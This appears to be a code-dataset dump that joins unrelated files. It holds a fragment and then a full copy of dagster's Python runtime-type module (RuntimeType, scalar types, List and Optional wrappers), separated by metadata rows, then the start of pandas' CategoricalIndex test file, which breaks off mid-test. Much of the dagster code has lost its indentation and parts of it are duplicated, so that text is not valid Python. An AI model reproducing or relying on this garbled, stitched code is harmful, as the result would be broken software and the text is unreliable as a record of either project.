        super(ListType, self).__init__(
            key=key, name=None, input_hydration_config=_create_list_input_schema(inner_type)
        )
        self.inner_type = inner_type
    @property
    def display_name(self):
        # Rendered as e.g. '[Int]'.
        return '[' + self.inner_type.display_name + ']'
    def type_check(self, value):
        """Raise Failure unless ``value`` is a list whose elements all pass
        the inner type's check."""
        from dagster.core.definitions.events import Failure
        if not isinstance(value, list):
            raise Failure('Value must be a list, got {value}'.format(value=value))
        for item in value:
            self.inner_type.type_check(item)
    @property
    def is_list(self):
        return True
    @property
    def inner_types(self):
        # Direct inner type plus its transitive inner types.
        return [self.inner_type] + self.inner_type.inner_types
def Optional(inner_type):
    """Return a NullableType instance wrapping ``inner_type``.

    A fresh subclass is created per call so construction goes through the
    RuntimeType.inst() protocol.
    """
    check.inst_param(inner_type, 'inner_type', RuntimeType)

    class _OptionalOf(NullableType):
        def __init__(self):
            super(_OptionalOf, self).__init__(inner_type)

    return _OptionalOf.inst()
def List(inner_type):
    """Return a ListType instance whose elements are ``inner_type``.

    A fresh subclass is created per call so construction goes through the
    RuntimeType.inst() protocol.
    """
    check.inst_param(inner_type, 'inner_type', RuntimeType)

    class _ListOf(ListType):
        def __init__(self):
            super(_ListOf, self).__init__(inner_type)

    return _ListOf.inst()
class Stringish(RuntimeType):
    """Base class for runtime types whose values are strings."""

    def __init__(self, key=None, name=None, **kwargs):
        # Name defaults to the concrete subclass's name; key defaults to name.
        name = check.opt_str_param(name, 'name', type(self).__name__)
        key = check.opt_str_param(key, 'key', name)
        super(Stringish, self).__init__(key=key, name=name, **kwargs)

    @property
    def is_scalar(self):
        # BUG FIX: is_scalar is a @property on RuntimeType (and on
        # BuiltinScalarRuntimeType). Defining it here as a plain method
        # shadowed the property, so `t.is_scalar` evaluated to a bound
        # method object instead of a bool.
        return True

    def type_check(self, value):
        """Raise Failure unless ``value`` is a string."""
        return _throw_if_not_string(value)
# Singleton runtime-type instances for each BuiltinEnum member; consumed by
# RuntimeType.from_builtin_enum to resolve builtins to runtime types.
_RUNTIME_MAP = {
    BuiltinEnum.ANY: Any.inst(),
    BuiltinEnum.BOOL: Bool.inst(),
    BuiltinEnum.FLOAT: Float.inst(),
    BuiltinEnum.INT: Int.inst(),
    BuiltinEnum.PATH: Path.inst(),
    BuiltinEnum.STRING: String.inst(),
    BuiltinEnum.NOTHING: Nothing.inst(),
}
def resolve_to_runtime_type(dagster_type):
    """Resolve any user-facing type specification to a RuntimeType instance.
    Accepts None (resolved to Any), a BuiltinEnum member, wrapping
    List/Nullable markers, a runtime-type-decorated class, or a RuntimeType
    subclass. Fails on anything else.
    """
    # Local imports to break a circular dependency with sibling modules.
    from .decorator import is_runtime_type_decorated_klass, get_runtime_type_on_decorated_klass
    from .mapping import remap_python_type
    dagster_type = remap_python_type(dagster_type)
    check_dagster_type_param(dagster_type, 'dagster_type', RuntimeType)
    if dagster_type is None:
        return Any.inst()
    if BuiltinEnum.contains(dagster_type):
        return RuntimeType.from_builtin_enum(dagster_type)
    if isinstance(dagster_type, WrappingListType):
        return resolve_to_runtime_list(dagster_type)
    if isinstance(dagster_type, WrappingNullableType):
        return resolve_to_runtime_nullable(dagster_type)
    if is_runtime_type_decorated_klass(dagster_type):
        return get_runtime_type_on_decorated_klass(dagster_type)
    if issubclass(dagster_type, RuntimeType):
        return dagster_type.inst()
    # check_dagster_type_param above should have rejected anything that
    # reaches this point.
    check.failed('should not reach')
def resolve_to_runtime_list(list_type):
    """Convert a WrappingListType marker into a runtime ListType."""
    check.inst_param(list_type, 'list_type', WrappingListType)
    return List(resolve_to_runtime_type(list_type.inner_type))
def resolve_to_runtime_nullable(nullable_type):
    """Convert a WrappingNullableType marker into a runtime NullableType."""
    check.inst_param(nullable_type, 'nullable_type', WrappingNullableType)
    return Optional(resolve_to_runtime_type(nullable_type.inner_type))
ALL_RUNTIME_BUILTINS = set(_RUNTIME_MAP.values())
def construct_runtime_type_dictionary(solid_defs):
    """Map type name -> RuntimeType for all builtins plus every runtime type
    referenced by the given solid definitions (later entries win by name)."""
    type_dict = {t.name: t for t in ALL_RUNTIME_BUILTINS}
    for solid_def in solid_defs:
        for runtime_type in solid_def.all_runtime_types():
            type_dict[runtime_type.name] = runtime_type
    return type_dict
| 31.467466 | 100 | 0.681885 | from functools import partial
import six
from dagster import check
from dagster.core.storage.type_storage import TypeStoragePlugin
from .builtin_enum import BuiltinEnum
from .builtin_config_schemas import BuiltinSchemas
from .config import ConfigType
from .config import List as ConfigList
from .config import Nullable as ConfigNullable
from .config_schema import InputHydrationConfig, OutputMaterializationConfig
from .marshal import SerializationStrategy, PickleSerializationStrategy
from .dagster_type import check_dagster_type_param
from .wrapping import WrappingListType, WrappingNullableType
def check_opt_config_cls_param(config_cls, param_name):
    """Validate that ``config_cls`` is None or a ConfigType subclass.

    Returns ``config_cls`` unchanged; raises (via check) otherwise.
    """
    if config_cls is not None:
        check.invariant(isinstance(config_cls, type))
        check.param_invariant(issubclass(config_cls, ConfigType), param_name)
    return config_cls
class RuntimeType(object):
    """Base class for all dagster runtime types.
    Subclasses are singletons: construct them only through ``inst()``, which
    caches one instance per subclass; calling the constructor twice for the
    same subclass fails.
    """
    def __init__(
        self,
        key,
        name,
        is_builtin=False,
        description=None,
        input_hydration_config=None,
        output_materialization_config=None,
        serialization_strategy=None,
        auto_plugins=None,
    ):
        # Guard against direct construction: inst() must be the only entry
        # point so each subclass stays a singleton.
        type_obj = type(self)
        if type_obj in RuntimeType.__cache:
            check.failed(
                (
                    '{type_obj} already in cache. You **must** use the inst() class method '
                    'to construct RuntimeType and not the ctor'.format(type_obj=type_obj)
                )
            )
        self.key = check.str_param(key, 'key')
        self.name = check.opt_str_param(name, 'name')
        self.description = check.opt_str_param(description, 'description')
        self.input_hydration_config = check.opt_inst_param(
            input_hydration_config, 'input_hydration_config', InputHydrationConfig
        )
        self.output_materialization_config = check.opt_inst_param(
            output_materialization_config,
            'output_materialization_config',
            OutputMaterializationConfig,
        )
        # Pickle-based serialization is the default strategy.
        self.serialization_strategy = check.opt_inst_param(
            serialization_strategy,
            'serialization_strategy',
            SerializationStrategy,
            PickleSerializationStrategy(),
        )
        auto_plugins = check.opt_list_param(auto_plugins, 'auto_plugins', of_type=type)
        check.param_invariant(
            all(
                issubclass(auto_plugin_type, TypeStoragePlugin) for auto_plugin_type in auto_plugins
            ),
            'auto_plugins',
        )
        self.auto_plugins = auto_plugins
        self.is_builtin = check.bool_param(is_builtin, 'is_builtin')
    # Class-level singleton cache keyed by subclass; populated by inst().
    # Defined after __init__ textually, but available by the time __init__
    # runs since class-body execution completes first.
    __cache = {}
    @classmethod
    def inst(cls):
        """Return the cached singleton instance of this subclass."""
        if cls not in RuntimeType.__cache:
            RuntimeType.__cache[cls] = cls()
        return RuntimeType.__cache[cls]
    @staticmethod
    def from_builtin_enum(builtin_enum):
        """Map a BuiltinEnum member to its runtime-type singleton."""
        check.invariant(BuiltinEnum.contains(builtin_enum), 'must be member of BuiltinEnum')
        return _RUNTIME_MAP[builtin_enum]
    @property
    def display_name(self):
        return self.name
    def type_check(self, value):
        # No-op by default; subclasses override and raise Failure on mismatch.
        pass
    # Classification flags, overridden by the respective subclasses.
    @property
    def is_any(self):
        return False
    @property
    def is_scalar(self):
        return False
    @property
    def is_list(self):
        return False
    @property
    def is_nullable(self):
        return False
    @property
    def inner_types(self):
        return []
    @property
    def is_nothing(self):
        return False
class BuiltinScalarRuntimeType(RuntimeType):
    """Base for the builtin scalar types; key and name are derived from the
    subclass name and is_builtin is forced on."""
    def __init__(self, *args, **kwargs):
        name = type(self).__name__
        super(BuiltinScalarRuntimeType, self).__init__(
            key=name, name=name, is_builtin=True, *args, **kwargs
        )
    @property
    def is_scalar(self):
        return True
class Int(BuiltinScalarRuntimeType):
    """Builtin integer scalar type."""
    def __init__(self):
        super(Int, self).__init__(
            input_hydration_config=BuiltinSchemas.INT_INPUT,
            output_materialization_config=BuiltinSchemas.INT_OUTPUT,
        )
    def type_check(self, value):
        """Raise Failure unless ``value`` is an integer."""
        from dagster.core.definitions.events import Failure
        # six.integer_types also covers py2 `long`. NOTE(review): bool is a
        # subclass of int in python, so True/False pass this check.
        if not isinstance(value, six.integer_types):
            raise Failure(_typemismatch_error_str(value, 'int'))
def _typemismatch_error_str(value, expected_type_desc):
return 'Value "{value}" of python type "{python_type}" must be a {type_desc}.'.format(
value=value, python_type=type(value).__name__, type_desc=expected_type_desc
)
def _throw_if_not_string(value):
    """Raise Failure unless ``value`` is a string (``six.string_types``)."""
    from dagster.core.definitions.events import Failure
    if not isinstance(value, six.string_types):
        raise Failure(_typemismatch_error_str(value, 'string'))
class String(BuiltinScalarRuntimeType):
    """Builtin string scalar type."""
    def __init__(self):
        super(String, self).__init__(
            input_hydration_config=BuiltinSchemas.STRING_INPUT,
            output_materialization_config=BuiltinSchemas.STRING_OUTPUT,
        )
    def type_check(self, value):
        _throw_if_not_string(value)
class Path(BuiltinScalarRuntimeType):
    """Builtin filesystem-path type; values are checked as plain strings."""
    def __init__(self):
        super(Path, self).__init__(
            input_hydration_config=BuiltinSchemas.PATH_INPUT,
            output_materialization_config=BuiltinSchemas.PATH_OUTPUT,
        )
    def type_check(self, value):
        _throw_if_not_string(value)
class Float(BuiltinScalarRuntimeType):
    """Builtin float scalar type."""
    def __init__(self):
        super(Float, self).__init__(
            input_hydration_config=BuiltinSchemas.FLOAT_INPUT,
            output_materialization_config=BuiltinSchemas.FLOAT_OUTPUT,
        )
    def type_check(self, value):
        """Raise Failure unless ``value`` is a python float."""
        from dagster.core.definitions.events import Failure
        # NOTE(review): strict float check -- ints are rejected here, unlike
        # typical numeric coercion. Confirm this is intended.
        if not isinstance(value, float):
            raise Failure(_typemismatch_error_str(value, 'float'))
class Bool(BuiltinScalarRuntimeType):
    """Builtin boolean scalar type."""
    def __init__(self):
        super(Bool, self).__init__(
            input_hydration_config=BuiltinSchemas.BOOL_INPUT,
            output_materialization_config=BuiltinSchemas.BOOL_OUTPUT,
        )
    def type_check(self, value):
        """Raise Failure unless ``value`` is a python bool."""
        from dagster.core.definitions.events import Failure
        if not isinstance(value, bool):
            raise Failure(_typemismatch_error_str(value, 'bool'))
class Anyish(RuntimeType):
def __init__(
self,
key,
name,
input_hydration_config=None,
output_materialization_config=None,
is_builtin=False,
description=None,
):
super(Anyish, self).__init__(
key=key,
name=name,
input_hydration_config=input_hydration_config,
output_materialization_config=output_materialization_config,
is_builtin=is_builtin,
description=description,
)
@property
def is_any(self):
return True
class Any(Anyish):
def __init__(self):
super(Any, self).__init__(
key='Any',
name='Any',
input_hydration_config=BuiltinSchemas.ANY_INPUT,
output_materialization_config=BuiltinSchemas.ANY_OUTPUT,
is_builtin=True,
)
def define_any_type(name, description=None):
class NamedAnyType(Anyish):
def __init__(self):
super(NamedAnyType, self).__init__(key=name, name=name, description=description)
return NamedAnyType
class Nothing(RuntimeType):
    """Runtime type representing the absence of a value.

    The only valid runtime value is ``None``; ``is_nothing`` lets the engine
    identify this type.
    """

    def __init__(self):
        super(Nothing, self).__init__(
            key='Nothing',
            name='Nothing',
            input_hydration_config=None,
            output_materialization_config=None,
            is_builtin=True,
        )

    @property
    def is_nothing(self):
        return True

    def type_check(self, value):
        """Raise Failure unless ``value`` is None."""
        from dagster.core.definitions.events import Failure

        if value is not None:
            # BUG FIX: the original raised the literal string
            # 'Value {value} must be None.' because .format() was never
            # called, so the placeholder was shown verbatim to users.
            raise Failure('Value {value} must be None.'.format(value=value))
class PythonObjectType(RuntimeType):
def __init__(self, python_type, key=None, name=None, typecheck_metadata_fn=None, **kwargs):
name = check.opt_str_param(name, 'name', type(self).__name__)
key = check.opt_str_param(key, 'key', name)
super(PythonObjectType, self).__init__(key=key, name=name, **kwargs)
self.python_type = check.type_param(python_type, 'python_type')
self.typecheck_metadata_fn = check.opt_callable_param(
typecheck_metadata_fn, 'typecheck_metadata_fn'
)
def type_check(self, value):
from dagster.core.definitions.events import Failure
if not isinstance(value, self.python_type):
raise Failure(
'Value {value} should be of type {type_name}.'.format(
value=value, type_name=self.python_type.__name__
)
)
if self.typecheck_metadata_fn:
return self.typecheck_metadata_fn(value)
def define_python_dagster_type(
python_type,
name=None,
description=None,
input_hydration_config=None,
output_materialization_config=None,
serialization_strategy=None,
auto_plugins=None,
typecheck_metadata_fn=None,
):
check.type_param(python_type, 'python_type')
check.opt_str_param(name, 'name')
check.opt_str_param(description, 'description')
check.opt_inst_param(input_hydration_config, 'input_hydration_config', InputHydrationConfig)
check.opt_inst_param(
output_materialization_config, 'output_materialization_config', OutputMaterializationConfig
)
check.opt_inst_param(
serialization_strategy,
'serialization_strategy',
SerializationStrategy,
default=PickleSerializationStrategy(),
)
auto_plugins = check.opt_list_param(auto_plugins, 'auto_plugins', of_type=type)
check.param_invariant(
all(issubclass(auto_plugin_type, TypeStoragePlugin) for auto_plugin_type in auto_plugins),
'auto_plugins',
)
check.opt_callable_param(typecheck_metadata_fn, 'typecheck_metadata_fn')
class _ObjectType(PythonObjectType):
def __init__(self):
super(_ObjectType, self).__init__(
python_type=python_type,
name=name,
description=description,
input_hydration_config=input_hydration_config,
output_materialization_config=output_materialization_config,
serialization_strategy=serialization_strategy,
auto_plugins=auto_plugins,
typecheck_metadata_fn=typecheck_metadata_fn,
)
return _ObjectType
def _create_nullable_input_schema(inner_type):
if not inner_type.input_hydration_config:
return None
nullable_type = ConfigNullable(inner_type.input_hydration_config.schema_type).inst()
class _NullableSchema(InputHydrationConfig):
@property
def schema_type(self):
return nullable_type
def construct_from_config_value(self, context, config_value):
if config_value is None:
return None
return inner_type.input_hydration_config.construct_from_config_value(
context, config_value
)
return _NullableSchema()
class NullableType(RuntimeType):
def __init__(self, inner_type):
key = 'Optional.' + inner_type.key
super(NullableType, self).__init__(
key=key, name=None, input_hydration_config=_create_nullable_input_schema(inner_type)
)
self.inner_type = inner_type
@property
def display_name(self):
return self.inner_type.display_name + '?'
def type_check(self, value):
return None if value is None else self.inner_type.type_check(value)
@property
def is_nullable(self):
return True
@property
def inner_types(self):
return [self.inner_type] + self.inner_type.inner_types
def _create_list_input_schema(inner_type):
if not inner_type.input_hydration_config:
return None
list_type = ConfigList(inner_type.input_hydration_config.schema_type).inst()
class _ListSchema(InputHydrationConfig):
@property
def schema_type(self):
return list_type
def construct_from_config_value(self, context, config_value):
convert_item = partial(
inner_type.input_hydration_config.construct_from_config_value, context
)
return list(map(convert_item, config_value))
return _ListSchema()
class ListType(RuntimeType):
def __init__(self, inner_type):
key = 'List.' + inner_type.key
super(ListType, self).__init__(
key=key, name=None, input_hydration_config=_create_list_input_schema(inner_type)
)
self.inner_type = inner_type
@property
def display_name(self):
return '[' + self.inner_type.display_name + ']'
def type_check(self, value):
from dagster.core.definitions.events import Failure
if not isinstance(value, list):
raise Failure('Value must be a list, got {value}'.format(value=value))
for item in value:
self.inner_type.type_check(item)
@property
def is_list(self):
return True
@property
def inner_types(self):
return [self.inner_type] + self.inner_type.inner_types
def Optional(inner_type):
check.inst_param(inner_type, 'inner_type', RuntimeType)
class _Nullable(NullableType):
def __init__(self):
super(_Nullable, self).__init__(inner_type)
return _Nullable.inst()
def List(inner_type):
check.inst_param(inner_type, 'inner_type', RuntimeType)
class _List(ListType):
def __init__(self):
super(_List, self).__init__(inner_type)
return _List.inst()
class Stringish(RuntimeType):
    """Base class for runtime types whose values are strings."""

    def __init__(self, key=None, name=None, **kwargs):
        # Name defaults to the concrete subclass's name; key defaults to name.
        name = check.opt_str_param(name, 'name', type(self).__name__)
        key = check.opt_str_param(key, 'key', name)
        super(Stringish, self).__init__(key=key, name=name, **kwargs)

    @property
    def is_scalar(self):
        # BUG FIX: is_scalar is a @property on RuntimeType (and on
        # BuiltinScalarRuntimeType). Defining it here as a plain method
        # shadowed the property, so `t.is_scalar` evaluated to a bound
        # method object instead of a bool.
        return True

    def type_check(self, value):
        """Raise Failure unless ``value`` is a string."""
        return _throw_if_not_string(value)
_RUNTIME_MAP = {
BuiltinEnum.ANY: Any.inst(),
BuiltinEnum.BOOL: Bool.inst(),
BuiltinEnum.FLOAT: Float.inst(),
BuiltinEnum.INT: Int.inst(),
BuiltinEnum.PATH: Path.inst(),
BuiltinEnum.STRING: String.inst(),
BuiltinEnum.NOTHING: Nothing.inst(),
}
def resolve_to_runtime_type(dagster_type):
from .decorator import is_runtime_type_decorated_klass, get_runtime_type_on_decorated_klass
from .mapping import remap_python_type
dagster_type = remap_python_type(dagster_type)
check_dagster_type_param(dagster_type, 'dagster_type', RuntimeType)
if dagster_type is None:
return Any.inst()
if BuiltinEnum.contains(dagster_type):
return RuntimeType.from_builtin_enum(dagster_type)
if isinstance(dagster_type, WrappingListType):
return resolve_to_runtime_list(dagster_type)
if isinstance(dagster_type, WrappingNullableType):
return resolve_to_runtime_nullable(dagster_type)
if is_runtime_type_decorated_klass(dagster_type):
return get_runtime_type_on_decorated_klass(dagster_type)
if issubclass(dagster_type, RuntimeType):
return dagster_type.inst()
check.failed('should not reach')
def resolve_to_runtime_list(list_type):
check.inst_param(list_type, 'list_type', WrappingListType)
return List(resolve_to_runtime_type(list_type.inner_type))
def resolve_to_runtime_nullable(nullable_type):
check.inst_param(nullable_type, 'nullable_type', WrappingNullableType)
return Optional(resolve_to_runtime_type(nullable_type.inner_type))
ALL_RUNTIME_BUILTINS = set(_RUNTIME_MAP.values())
def construct_runtime_type_dictionary(solid_defs):
type_dict = {t.name: t for t in ALL_RUNTIME_BUILTINS}
for solid_def in solid_defs:
for runtime_type in solid_def.all_runtime_types():
type_dict[runtime_type.name] = runtime_type
return type_dict
| true | true |
f7328a99195b9c2f34557772f93a23c78d7e72a9 | 43,541 | py | Python | pandas/tests/indexes/test_category.py | zfrenchee/pandas | d28f9326de26882a9b4dc0bee9dec5c598747190 | [
"BSD-3-Clause"
] | null | null | null | pandas/tests/indexes/test_category.py | zfrenchee/pandas | d28f9326de26882a9b4dc0bee9dec5c598747190 | [
"BSD-3-Clause"
] | null | null | null | pandas/tests/indexes/test_category.py | zfrenchee/pandas | d28f9326de26882a9b4dc0bee9dec5c598747190 | [
"BSD-3-Clause"
] | 1 | 2019-03-31T13:46:57.000Z | 2019-03-31T13:46:57.000Z | # -*- coding: utf-8 -*-
import pytest
import pandas.util.testing as tm
from pandas.core.indexes.api import Index, CategoricalIndex
from pandas.core.dtypes.dtypes import CategoricalDtype
from .common import Base
from pandas.compat import range, PY3
import numpy as np
from pandas import Categorical, IntervalIndex, compat
from pandas.util.testing import assert_almost_equal
import pandas.core.config as cf
import pandas as pd
if PY3:
    # Python 3 has no `unicode` builtin; tests that wrap literals in
    # unicode() use this identity shim instead.
    unicode = lambda x: x
class TestCategoricalIndex(Base):
_holder = CategoricalIndex
    def setup_method(self, method):
        # Base-test fixture: a single random CategoricalIndex of length 100,
        # exposed via self.indices and as attributes by setup_indices().
        self.indices = dict(catIndex=tm.makeCategoricalIndex(100))
        self.setup_indices()
def create_index(self, categories=None, ordered=False):
if categories is None:
categories = list('cab')
return CategoricalIndex(
list('aabbca'), categories=categories, ordered=ordered)
    def test_construction(self):
        """CategoricalIndex construction from CI instances, Categoricals,
        raw values, and with explicit categories/ordered arguments."""
        ci = self.create_index(categories=list('abcd'))
        categories = ci.categories
        # round-trip through Index keeps type and ordering flag
        result = Index(ci)
        tm.assert_index_equal(result, ci, exact=True)
        assert not result.ordered
        result = Index(ci.values)
        tm.assert_index_equal(result, ci, exact=True)
        assert not result.ordered
        # empty
        result = CategoricalIndex(categories=categories)
        tm.assert_index_equal(result.categories, Index(categories))
        tm.assert_numpy_array_equal(result.codes, np.array([], dtype='int8'))
        assert not result.ordered
        # passing categories
        result = CategoricalIndex(list('aabbca'), categories=categories)
        tm.assert_index_equal(result.categories, Index(categories))
        tm.assert_numpy_array_equal(result.codes,
                                    np.array([0, 0, 1,
                                              1, 2, 0], dtype='int8'))
        # from a Categorical; categories inferred as sorted uniques
        c = pd.Categorical(list('aabbca'))
        result = CategoricalIndex(c)
        tm.assert_index_equal(result.categories, Index(list('abc')))
        tm.assert_numpy_array_equal(result.codes,
                                    np.array([0, 0, 1,
                                              1, 2, 0], dtype='int8'))
        assert not result.ordered
        result = CategoricalIndex(c, categories=categories)
        tm.assert_index_equal(result.categories, Index(categories))
        tm.assert_numpy_array_equal(result.codes,
                                    np.array([0, 0, 1,
                                              1, 2, 0], dtype='int8'))
        assert not result.ordered
        ci = CategoricalIndex(c, categories=list('abcd'))
        result = CategoricalIndex(ci)
        tm.assert_index_equal(result.categories, Index(categories))
        tm.assert_numpy_array_equal(result.codes,
                                    np.array([0, 0, 1,
                                              1, 2, 0], dtype='int8'))
        assert not result.ordered
        # narrowing categories maps missing values to code -1
        result = CategoricalIndex(ci, categories=list('ab'))
        tm.assert_index_equal(result.categories, Index(list('ab')))
        tm.assert_numpy_array_equal(result.codes,
                                    np.array([0, 0, 1,
                                              1, -1, 0], dtype='int8'))
        assert not result.ordered
        result = CategoricalIndex(ci, categories=list('ab'), ordered=True)
        tm.assert_index_equal(result.categories, Index(list('ab')))
        tm.assert_numpy_array_equal(result.codes,
                                    np.array([0, 0, 1,
                                              1, -1, 0], dtype='int8'))
        assert result.ordered
        result = pd.CategoricalIndex(ci, categories=list('ab'), ordered=True)
        expected = pd.CategoricalIndex(ci, categories=list('ab'), ordered=True,
                                       dtype='category')
        tm.assert_index_equal(result, expected, exact=True)
        # turn me to an Index
        result = Index(np.array(ci))
        assert isinstance(result, Index)
        assert not isinstance(result, CategoricalIndex)
    def test_construction_with_dtype(self):
        """Construction via dtype='category' on Index and from Index data."""
        # specify dtype
        ci = self.create_index(categories=list('abc'))
        result = Index(np.array(ci), dtype='category')
        tm.assert_index_equal(result, ci, exact=True)
        result = Index(np.array(ci).tolist(), dtype='category')
        tm.assert_index_equal(result, ci, exact=True)
        # these are generally only equal when the categories are reordered
        ci = self.create_index()
        result = Index(
            np.array(ci), dtype='category').reorder_categories(ci.categories)
        tm.assert_index_equal(result, ci, exact=True)
        # make sure indexes are handled
        expected = CategoricalIndex([0, 1, 2], categories=[0, 1, 2],
                                    ordered=True)
        idx = Index(range(3))
        result = CategoricalIndex(idx, categories=idx, ordered=True)
        tm.assert_index_equal(result, expected, exact=True)
    def test_construction_with_categorical_dtype(self):
        """Construction with an explicit CategoricalDtype (GH18109), and the
        error when dtype is combined with categories/ordered."""
        data, cats, ordered = 'a a b b'.split(), 'c b a'.split(), True
        dtype = CategoricalDtype(categories=cats, ordered=ordered)
        result = pd.CategoricalIndex(data, dtype=dtype)
        expected = pd.CategoricalIndex(data, categories=cats,
                                       ordered=ordered)
        tm.assert_index_equal(result, expected, exact=True)
        # error to combine categories or ordered and dtype keywords args
        with pytest.raises(ValueError, match="Cannot specify both `dtype` and "
                           "`categories` or `ordered`."):
            pd.CategoricalIndex(data, categories=cats, dtype=dtype)
        with pytest.raises(ValueError, match="Cannot specify both `dtype` and "
                           "`categories` or `ordered`."):
            pd.CategoricalIndex(data, ordered=ordered, dtype=dtype)
def test_create_categorical(self):
# https://github.com/pandas-dev/pandas/pull/17513
# The public CI constructor doesn't hit this code path with
# instances of CategoricalIndex, but we still want to test the code
ci = CategoricalIndex(['a', 'b', 'c'])
# First ci is self, second ci is data.
result = CategoricalIndex._create_categorical(ci, ci)
expected = Categorical(['a', 'b', 'c'])
tm.assert_categorical_equal(result, expected)
def test_disallow_set_ops(self):
# GH 10039
# set ops (+/-) raise TypeError
idx = pd.Index(pd.Categorical(['a', 'b']))
pytest.raises(TypeError, lambda: idx - idx)
pytest.raises(TypeError, lambda: idx + idx)
pytest.raises(TypeError, lambda: idx - ['a', 'b'])
pytest.raises(TypeError, lambda: idx + ['a', 'b'])
pytest.raises(TypeError, lambda: ['a', 'b'] - idx)
pytest.raises(TypeError, lambda: ['a', 'b'] + idx)
    def test_method_delegation(self):
        """Category-mutating methods delegated from Categorical (set/rename/
        add/remove categories, as_ordered/as_unordered) return new indexes."""
        ci = CategoricalIndex(list('aabbca'), categories=list('cabdef'))
        result = ci.set_categories(list('cab'))
        tm.assert_index_equal(result, CategoricalIndex(
            list('aabbca'), categories=list('cab')))
        ci = CategoricalIndex(list('aabbca'), categories=list('cab'))
        result = ci.rename_categories(list('efg'))
        tm.assert_index_equal(result, CategoricalIndex(
            list('ffggef'), categories=list('efg')))
        # GH18862 (let rename_categories take callables)
        result = ci.rename_categories(lambda x: x.upper())
        tm.assert_index_equal(result, CategoricalIndex(
            list('AABBCA'), categories=list('CAB')))
        ci = CategoricalIndex(list('aabbca'), categories=list('cab'))
        result = ci.add_categories(['d'])
        tm.assert_index_equal(result, CategoricalIndex(
            list('aabbca'), categories=list('cabd')))
        ci = CategoricalIndex(list('aabbca'), categories=list('cab'))
        result = ci.remove_categories(['c'])
        tm.assert_index_equal(result, CategoricalIndex(
            list('aabb') + [np.nan] + ['a'], categories=list('ab')))
        ci = CategoricalIndex(list('aabbca'), categories=list('cabdef'))
        result = ci.as_unordered()
        tm.assert_index_equal(result, ci)
        ci = CategoricalIndex(list('aabbca'), categories=list('cabdef'))
        result = ci.as_ordered()
        tm.assert_index_equal(result, CategoricalIndex(
            list('aabbca'), categories=list('cabdef'), ordered=True))
        # invalid: in-place mutation is not allowed on an index
        pytest.raises(ValueError, lambda: ci.set_categories(
            list('cab'), inplace=True))
    def test_contains(self):
        """Membership checks values (not codes); NaN only when present."""
        ci = self.create_index(categories=list('cabdef'))
        assert 'a' in ci
        assert 'z' not in ci
        # 'e' is a category but not a value of the index
        assert 'e' not in ci
        assert np.nan not in ci
        # assert codes NOT in index
        assert 0 not in ci
        assert 1 not in ci
        ci = CategoricalIndex(
            list('aabbca') + [np.nan], categories=list('cabdef'))
        assert np.nan in ci
    def test_min_max(self):
        """min/max require an ordered categorical; they follow category
        order ('c' < 'a' < 'b' for the fixture), not lexical order."""
        ci = self.create_index(ordered=False)
        pytest.raises(TypeError, lambda: ci.min())
        pytest.raises(TypeError, lambda: ci.max())
        ci = self.create_index(ordered=True)
        assert ci.min() == 'c'
        assert ci.max() == 'b'
    def test_map(self):
        """map over a CategoricalIndex: preserves orderedness and name,
        returns an Index, and supports callables, Series and dict mappers."""
        ci = pd.CategoricalIndex(list('ABABC'), categories=list('CBA'),
                                 ordered=True)
        result = ci.map(lambda x: x.lower())
        exp = pd.CategoricalIndex(list('ababc'), categories=list('cba'),
                                  ordered=True)
        tm.assert_index_equal(result, exp)
        ci = pd.CategoricalIndex(list('ABABC'), categories=list('BAC'),
                                 ordered=False, name='XXX')
        result = ci.map(lambda x: x.lower())
        exp = pd.CategoricalIndex(list('ababc'), categories=list('bac'),
                                  ordered=False, name='XXX')
        tm.assert_index_equal(result, exp)
        # GH 12766: Return an index not an array
        tm.assert_index_equal(ci.map(lambda x: 1),
                              Index(np.array([1] * 5, dtype=np.int64),
                                    name='XXX'))
        # change categories dtype
        ci = pd.CategoricalIndex(list('ABABC'), categories=list('BAC'),
                                 ordered=False)
        def f(x):
            return {'A': 10, 'B': 20, 'C': 30}.get(x)
        result = ci.map(f)
        exp = pd.CategoricalIndex([10, 20, 10, 20, 30],
                                  categories=[20, 10, 30],
                                  ordered=False)
        tm.assert_index_equal(result, exp)
        result = ci.map(pd.Series([10, 20, 30], index=['A', 'B', 'C']))
        tm.assert_index_equal(result, exp)
        result = ci.map({'A': 10, 'B': 20, 'C': 30})
        tm.assert_index_equal(result, exp)
    def test_map_with_categorical_series(self):
        """GH 12756: mapping with a categorical Series yields a
        CategoricalIndex; with a plain Series, a regular Index."""
        a = pd.Index([1, 2, 3, 4])
        b = pd.Series(["even", "odd", "even", "odd"],
                      dtype="category")
        c = pd.Series(["even", "odd", "even", "odd"])
        # unmatched label 4 becomes NaN in both cases
        exp = CategoricalIndex(["odd", "even", "odd", np.nan])
        tm.assert_index_equal(a.map(b), exp)
        exp = pd.Index(["odd", "even", "odd", np.nan])
        tm.assert_index_equal(a.map(c), exp)
    @pytest.mark.parametrize('klass', [list, tuple, np.array, pd.Series])
    def test_where(self, klass):
        """where() with an all-True mask is a no-op; False entries become
        NaN while categories are preserved, for several mask containers."""
        i = self.create_index()
        cond = [True] * len(i)
        expected = i
        result = i.where(klass(cond))
        tm.assert_index_equal(result, expected)
        cond = [False] + [True] * (len(i) - 1)
        expected = CategoricalIndex([np.nan] + i[1:].tolist(),
                                    categories=i.categories)
        result = i.where(klass(cond))
        tm.assert_index_equal(result, expected)
    def test_append(self):
        """append of CategoricalIndex slices, empty lists, plain Index data,
        and the TypeError cases for mismatched/reordered categories."""
        ci = self.create_index()
        categories = ci.categories
        # append cats with the same categories
        result = ci[:3].append(ci[3:])
        tm.assert_index_equal(result, ci, exact=True)
        foos = [ci[:1], ci[1:3], ci[3:]]
        result = foos[0].append(foos[1:])
        tm.assert_index_equal(result, ci, exact=True)
        # empty
        result = ci.append([])
        tm.assert_index_equal(result, ci, exact=True)
        # appending with different or reordered categories is not ok
        pytest.raises(
            TypeError,
            lambda: ci.append(ci.values.set_categories(list('abcd'))))
        pytest.raises(
            TypeError,
            lambda: ci.append(ci.values.reorder_categories(list('abc'))))
        # with objects
        result = ci.append(Index(['c', 'a']))
        expected = CategoricalIndex(list('aabbcaca'), categories=categories)
        tm.assert_index_equal(result, expected, exact=True)
        # invalid objects
        pytest.raises(TypeError, lambda: ci.append(Index(['a', 'd'])))
        # GH14298 - if base object is not categorical -> coerce to object
        result = Index(['c', 'a']).append(ci)
        expected = Index(list('caaabbca'))
        tm.assert_index_equal(result, expected, exact=True)
    def test_insert(self):
        """insert works positionally (negative positions follow list
        semantics), works on an empty index, raises TypeError for values
        outside the categories, and GH 18295: any NA sentinel inserts as
        NaN."""
        ci = self.create_index()
        categories = ci.categories
        # test 0th element
